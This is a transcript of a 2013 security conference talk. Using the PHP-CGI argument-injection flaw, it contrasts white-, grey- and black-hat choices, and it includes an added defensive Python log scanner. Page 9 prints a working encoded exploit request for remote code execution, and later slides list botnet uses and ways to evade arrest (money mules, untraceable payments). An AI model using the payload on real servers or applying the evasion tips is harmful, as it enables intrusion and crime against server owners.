Defcamp 2013 - Does it pay to be a blackhat hacker
Transcript of Defcamp 2013 - Does it pay to be a blackhat hacker
Page 1
DOES IT PAY TO BE A BLACKHAT HACKER?
DefCamp Romania – November 29, 2013
Speaker: Dan Catalin VASILE
Page 2
About me
• Information Security Consultant
• OWASP Romania Board Member
• InfoSec Researcher / Writer / Presenter
http://www.pentest.ro
Page 3
Agenda
• What is a hacker?
• Different types of hats
• A real world vulnerability
• Exploitation
  – White
  – Grey
  – Black
• Gains and risks
• Conclusion
Page 4
What is a hacker?
Original definition (MIT 1960s & RFC 1392)
A person who delights in having an intimate understanding of the internal workings of a system, computers and computer networks in particular.
Main-stream media definition & general public acceptance (also in RFC 1392)
In mass media and general public usage, the word hacker refers to security breakers motivated mainly by financial gain.
Hackers may be motivated by a multitude of reasons, such as profit, protest, or challenge.
Page 5
Different kinds of hats
White hat
An ethical computer hacker, or a computer security expert, who specializes in penetration testing and in other testing methodologies to ensure the security of an organization's information systems.
Grey hat
A skilled hacker whose activities fall somewhere between white and black hat hackers in a variety of practices. Sometimes he acts illegally, though in good faith, to identify vulnerabilities in computing processes.
Black hat
A hacker who violates computer security for little reason beyond maliciousness or for personal gain.
Page 6
A real world vulnerability
Apache Web Server :: remote code execution
Where?
In the default installation of the php5-cgi package.
The problem
PHP-CGI-based setups contain a vulnerability in how the query string of a request for a .php file is parsed.
Description
php-cgi receives the processed query string as command-line arguments, so command-line switches such as -s, -d or -c can be passed to the php-cgi binary through the URL. This can be exploited to disclose source code and obtain arbitrary code execution.
Page 7
A real world vulnerability
Apache Web Server :: remote code execution
The vulnerability
In the source code file sapi/cgi/cgi_main.c of PHP we can see that the security check is done when the php.ini configuration setting cgi.force_redirect is set and the php.ini configuration setting cgi.redirect_status_env is set to NULL.
It is possible to set cgi.force_redirect to zero and cgi.redirect_status_env to zero using the -d switch, so that php-cgi gets fully executed and we can use the payload in the POST data field to execute arbitrary PHP.
STD_PHP_INI_ENTRY("cgi.force_redirect", "1", PHP_INI_SYSTEM, OnUpdateBool, force_redirect, php_cgi_globals_struct, php_cgi_globals)
STD_PHP_INI_ENTRY("cgi.redirect_status_env", NULL, PHP_INI_SYSTEM, OnUpdateString, redirect_status_env, php_cgi_globals_struct, php_cgi_globals)
Page 8
A real world vulnerability
Apache Web Server :: remote code execution
Impact!!!
A remote unauthenticated attacker could obtain sensitive information, cause a denial of service condition or may be able to execute arbitrary code with the privileges of the web server.
Page 9
A real world vulnerability
Apache Web Server :: remote code execution
Exploitation PoC
char poststr[] = "POST %s?%%2D%%64+%%61%%6C%%6C%%6F%%77%%5F" \
    "%%75%%72%%6C%%5F%%69%%6E%%63%%6C%%75%%64%%65%%3D%%6F%%6E+%%2D%%64" \
    "+%%73%%61%%66%%65%%5F%%6D%%6F%%64%%65%%3D%%6F%%66%%66+%%2D%%64+%%73" \
    "%%75%%68%%6F%%73%%69%%6E%%2E%%73%%69%%6D%%75%%6C%%61%%74%%69%%6F%%6E" \
    "%%3D%%6F%%6E+%%2D%%64+%%64%%69%%73%%61%%62%%6C%%65%%5F%%66%%75%%6E%%63" \
    "%%74%%69%%6F%%6E%%73%%3D%%22%%22+%%2D%%64+%%6F%%70%%65%%6E%%5F%%62" \
    "%%61%%73%%65%%64%%69%%72%%3D%%6E%%6F%%6E%%65+%%2D%%64+%%61%%75%%74" \
    "%%6F%%5F%%70%%72%%65%%70%%65%%6E%%64%%5F%%66%%69%%6C%%65%%3D%%70%%68" \
    "%%70%%3A%%2F%%2F%%69%%6E%%70%%75%%74+%%2D%%64+%%63%%67%%69%%2E%%66%%6F" \
    "%%72%%63%%65%%5F%%72%%65%%64%%69%%72%%65%%63%%74%%3D%%30+%%2D%%64+%%63" \
    "%%67%%69%%2E%%72%%65%%64%%69%%72%%65%%63%%74%%5F%%73%%74%%61%%74%%75%%73" \
    "%%5F%%65%%6E%%76%%3D%%30+%%2D%%6E HTTP/1.1\r\n" \
    "Host: %s\r\n" \
    "User-Agent: Mozilla/5.0 (iPad; CPU OS 6_0 like Mac OS X) AppleWebKit/536.26" \
    "(KHTML, like Gecko) Version/6.0 Mobile/10A5355d Safari/8536.25\r\n" \
    "Content-Type: application/x-www-form-urlencoded\r\n" \
    "Content-Length: %d\r\n" \
    "Connection: close\r\n\r\n%s";
The query string above, URL-decoded:
-d allow_url_include=on -d safe_mode=off -d suhosin.simulation=on -d disable_functions="" -d open_basedir=none -d auto_prepend_file=php://input -d cgi.force_redirect=0 -d cgi.redirect_status_env=0 -n
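From the defender's side, the property that makes this bug detectable is the one the PoC relies on: the web server hands a query string to the CGI program as command-line arguments only when it contains no unencoded "=" (RFC 3875, the CGI specification), which is why every "=" in the payload above is sent as %3D. The following is an added example, not code from the talk or from the PHP or Apache projects. It scans constructed Apache-style access log lines (the IPs, timestamps and requests are made up), reproduces the server's argv conversion for each request, and reports requests whose argv would contain php-cgi switches such as -d, -s or -n. The log format, the function names and the sample lines are all assumptions of this example.

```python
"""Detect php-cgi argument-injection attempts in web server access logs.

Added example for this transcript; it is not code from the talk. It scans
constructed Apache-style access log lines and flags requests whose query
string would reach php-cgi as command-line arguments (argv) rather than as
ordinary key=value parameters. The CGI specification only turns a query
string into argv when it contains no unencoded '=', so the check looks at
the raw query string for '=', then URL-decodes each '+'-separated token the
way the web server would, and reports tokens that look like php-cgi
switches (-d, -s, -n, -c, ...).
"""
import re
from urllib.parse import unquote

# Constructed sample log lines (Apache common-log style); not real traffic.
SAMPLE_LOG = """\
203.0.113.5 - - [29/Nov/2013:10:00:01 +0200] "GET /index.php?page=home HTTP/1.1" 200 512
203.0.113.7 - - [29/Nov/2013:10:00:02 +0200] "GET /index.php?-s HTTP/1.1" 200 2048
203.0.113.9 - - [29/Nov/2013:10:00:03 +0200] "POST /index.php?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%6E HTTP/1.1" 200 93
203.0.113.11 - - [29/Nov/2013:10:00:04 +0200] "GET /search.php?q=-d+something HTTP/1.1" 200 700
203.0.113.13 - - [29/Nov/2013:10:00:05 +0200] "GET /index.php?%2d%64 HTTP/1.1" 200 93
203.0.113.15 - - [29/Nov/2013:10:00:06 +0200] "GET /static/logo.png HTTP/1.1" 200 8000
"""

# Request line inside the quoted field: method, target (path?query), protocol.
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/\d\.\d"')
# A php-cgi style switch: '-' (or '--') followed by a letter, e.g. -d, -s, -n, -c.
SWITCH_RE = re.compile(r"^--?[A-Za-z]")


def split_target(target):
    """Split a request target into (path, raw_query); raw_query is None when absent."""
    path, sep, query = target.partition("?")
    return path, (query if sep else None)


def argv_from_query(raw_query):
    """Mimic the CGI argv conversion: no unencoded '=' means the query becomes argv.

    Returns the decoded argv list, or an empty list when the query would be
    passed as QUERY_STRING only (the normal key=value case).
    """
    if not raw_query or "=" in raw_query:
        return []
    # The server splits on '+' and percent-decodes each token separately,
    # so an encoded %3D inside a token still becomes '=' in argv.
    return [unquote(token) for token in raw_query.split("+")]


def injected_switches(raw_query):
    """Return the decoded argv tokens that look like php-cgi switches."""
    return [tok for tok in argv_from_query(raw_query) if SWITCH_RE.match(tok)]


def is_argv_injection(raw_query):
    """True when the query string would put at least one switch into php-cgi's argv."""
    return bool(injected_switches(raw_query))


def scan_log(text):
    """Scan access-log text; return one finding per suspicious request."""
    findings = []
    for line in text.splitlines():
        m = REQUEST_RE.search(line)
        if not m:
            continue  # not a parseable request line
        path, raw_query = split_target(m.group("target"))
        if raw_query is None or not is_argv_injection(raw_query):
            continue
        findings.append({
            "ip": line.split(" ", 1)[0],
            "method": m.group("method"),
            "path": path,
            "argv": argv_from_query(raw_query),
            "switches": injected_switches(raw_query),
        })
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"{f['ip']} {f['method']} {f['path']} argv={f['argv']} switches={f['switches']}")
```

Note that the fourth sample line (q=-d+something) is not flagged: it contains an unencoded "=", so the server passes it as QUERY_STRING, not as argv, and it is a legitimate search parameter. Checking the raw query for "=" before decoding is therefore essential; a rule that only looks for "-d" after decoding would produce false positives on ordinary traffic and miss nothing extra. The same condition (a query string with no "=" that contains "-" or "%2d") is what the mod_rewrite workaround published for this issue at the time tested for and what a WAF rule would key on; the real fix is the vendor patch for php-cgi.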
Page 10
A real world vulnerability
Apache Web Server :: remote code execution
Show me the numbers
Page 11
A tale of three
Alice Bob Mallory
Page 12
What are the options?
Responsible disclosure
- Let Apache know about the problem
- Let them fix it
- Allow “some” time for the patch to be installed on most (??) of the systems
- Make the public announcement and get the credit
- For some cash you can make Google pay for it
A list of bug bounty programs:
https://bugcrowd.com/list-of-bug-bounty-programs/
Page 13
What are the options?
Sell the vulnerability to a broker
- TippingPoint's Zero-Day Initiative
- iDefense's Vulnerability Contributor Program
- Vupen’s Threat Protection Program
Page 14
What are the options?
Exploit it on your own!
- Small scale
  - A few selected targets
- Very large scale
  - Internet size attack
  - Create a botnet of servers
Page 15
White Hat Alice
Employer: big consulting corporation
Annual net income: ~$80.000
Approach:
- Responsible disclosure
Gains:
- Fame
- ~$3k / reporting the vulnerability
https://www.google.com/about/appsecurity/patch-rewards/
Risks:
- Mainly risk free
Page 16
Grey Hat Bob
Employer: small web-hosting provider
Annual net income: ~$45.000
Approach:
- Exploit it on a small scale
- Sell it to a broker
- Disclose it anonymously
Gains:
- No fame, just some fortune
- $50k from the broker
- ~$15k / year
Risks:
- Legal charges for hacking
Page 17
Black Hat Mallory
Employer: self-employed/freelancer
Annual net income: ~$20.000
Approach:
- Exploit it on a ‘never-seen’ scale
Phase 1
Page 18
Black Hat Mallory
Phase 2
Scale? Millions of machines (10+)
Page 19
Black Hat Mallory
Uses for the botnet
• Distributed Denial-of-Service Attacks
• Spamming
• Sniffing Traffic
• Spreading new malware
• Advertisement services abuse
• Manipulating pools/games/etc
• Mass identity theft
• Many others
Page 20
Black Hat Mallory
DDOS
Market price: $200/10k bots/day
Mallory’s price? ~200k/day/client
Multiple clients
He can literally make millions every day.
Page 21
Black Hat Mallory
DDOS
Spamhaus DDOS attack
When?March 2013
How big?300Gbps
Page 22
Black Hat Mallory
Risks?
Besides being the most wanted cyber-criminal ever?
Going to jail!
Side thoughts
- He only uses Bitcoins or alternative untraceable payment options
- He uses money mules to cash out
- The botnet gets divided
- He moves to a country with no extradition treaty
Page 23
Aftermath
It takes months (years?) for the Internet to recover after such a breach.
Patching, releasing, clean installs and removing all the infections is a painfully long process, since the botnet tries to reactivate.
What was real and what was not?
- Apache PHP Vulnerability – REAL
- PoC – REAL
- The impact – not so real
- Black-hat exploitation – science-fiction, yet doable
Page 24
A tale of three
Alice Bob Mallory
Page 25
Conclusions
Are there any?
Does it pay to be blackhat?
It does. Financially. Only!
Do we hunt all blackhats down?
Different shades of gray.